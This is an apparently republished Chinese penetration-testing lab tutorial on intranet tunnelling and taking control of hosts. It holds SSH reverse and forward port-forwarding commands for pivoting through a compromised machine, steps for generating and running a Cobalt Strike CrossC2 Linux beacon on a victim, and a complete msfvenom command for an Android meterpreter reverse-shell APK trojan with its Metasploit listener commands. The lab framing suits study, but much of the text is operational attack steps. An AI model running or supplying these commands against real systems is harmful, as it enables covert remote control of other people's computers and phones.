赞
踩
案例二: 控制上线-插件-Linux&Mac&IOS&Android
这里dns隧道需要云服务器以及域名,就先不复现了,icmp和smb之前复现过
第123天:内网安全-域防火墙&入站出站规则&不出网隧道上线&组策略对象同步-CSDN博客
第125天:内网安全-隧道技术&SMB&ICMP&正反向连接&防火墙出入规则上线-CSDN博客
环境搭建
配置centos7,这里不用设置dns和网关
更新配置
win2019
确保两个都能ping通
现在配置防火墙,这里是iptables防火墙先不用了解,直接复制下面,即允许ssh隧道进行连接
- iptables -F
- iptables -A INPUT -p tcp --dport 22 -j ACCEPT
- iptables -A OUTPUT -p tcp --sport 22 -m state --state ESTABLISHED -j ACCEPT
- iptables -A OUTPUT -p udp --dport 53 -j ACCEPT
- iptables -A INPUT -p udp --sport 53 -j ACCEPT
- iptables -A INPUT -s 127.0.0.1 -d 127.0.0.1 -j ACCEPT
- iptables -A OUTPUT -s 127.0.0.1 -d 127.0.0.1 -j ACCEPT
- iptables -A INPUT -p tcp -s 0/0 --dport 80 -j ACCEPT
- iptables -A OUTPUT -p tcp --sport 80 -m state --state ESTABLISHED -j ACCEPT
- iptables-save > /etc/sysconfig/iptables
- iptables -L
利用条件:入站被限制,反向弹给攻击机
这里只是做实验,直接利用ssh进行连接,真实环境得从web到getshell
这里kali的ssh可能是某种策略无法被连接,临时换一台centos7备份(ip为147),建立ssh连接到跳板机
这里可以看到已经通过ssh切换了主机,执行下面的命令
- ssh -CfNg -R 攻击机的ip(随意):想通过跳板机连接主机的IP:80 root@攻击机的ip
- ssh -CfNg -R 1010:10.10.10.2:80 root@192.168.172.147
把win2019的80端口通过,被控主机(linux)反弹给攻击机(linux)
win2019的80端口页面
这个时候通过攻击机访问自己的1010端口
成功建立ssh隧道
利用条件:出站被限制,需要走正向
其实本质没有什么区别就是通过把想要控制的主机转发给已经控制的主机,通过访问已经控制的主机,进行访问想要控制的主机
- ssh -CfNg -L 被控主机的ip(随意):想通过跳板机连接主机的IP:80 root@被控主机的ip
- ssh -CfNg -L 1122:10.10.10.2:80 root@192.168.172.133
ssh连接
把win2019的80端口转发到控制主机的1122端口,访问控制主机的1122端口就能访问80端口页面
项目背景:cs平台只支持windows平台的测试,不支持linux测试,该插件解决了这一问题
项目地址:Release v3.3 - stable · gloxec/CrossC2 · GitHub
这里cs也得符合版本,没有的话用这个
链接:https://pan.baidu.com/s/1eK_v_oilUnEWEWFHiieVYA?pwd=hadx
提取码:hadx
下载以后添加三个脚本模块
上方会出现一个crossc2
目前只支持https反向连接和tcp的正向连接
先创建一个监听器
生成反弹模块
生成以后会有一个日志出现
复制这句话替换掉前面的,用刚才下载的gencrossc2.linux进行执行,这里注意看下面的cs版本与你的cs是否符合不符合的话无法登录
把这个生成的t_cc2.out移动到被攻击主机,加执行权限执行
成功上线
mac这里没有环境不做复现
msf对安卓进行渗透,如果你的msf也是在虚拟机的kali,模拟器在真机当中,可以把模拟器和真机都设置为桥接模式,可以互相访问。
然后利用下面这个模块生成apk包
msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.1.5 LPORT=3333 R > apk.apk
msf开启监听
- use exploit/multi/handler
- set payload android/meterpreter/reverse_tcp
- set lhost 0.0.0.0
- set lport 3333
- exploit
运行apk木马
直接上线
Copyright © 2003-2013 www.wpsshop.cn 版权所有,并保留所有权利。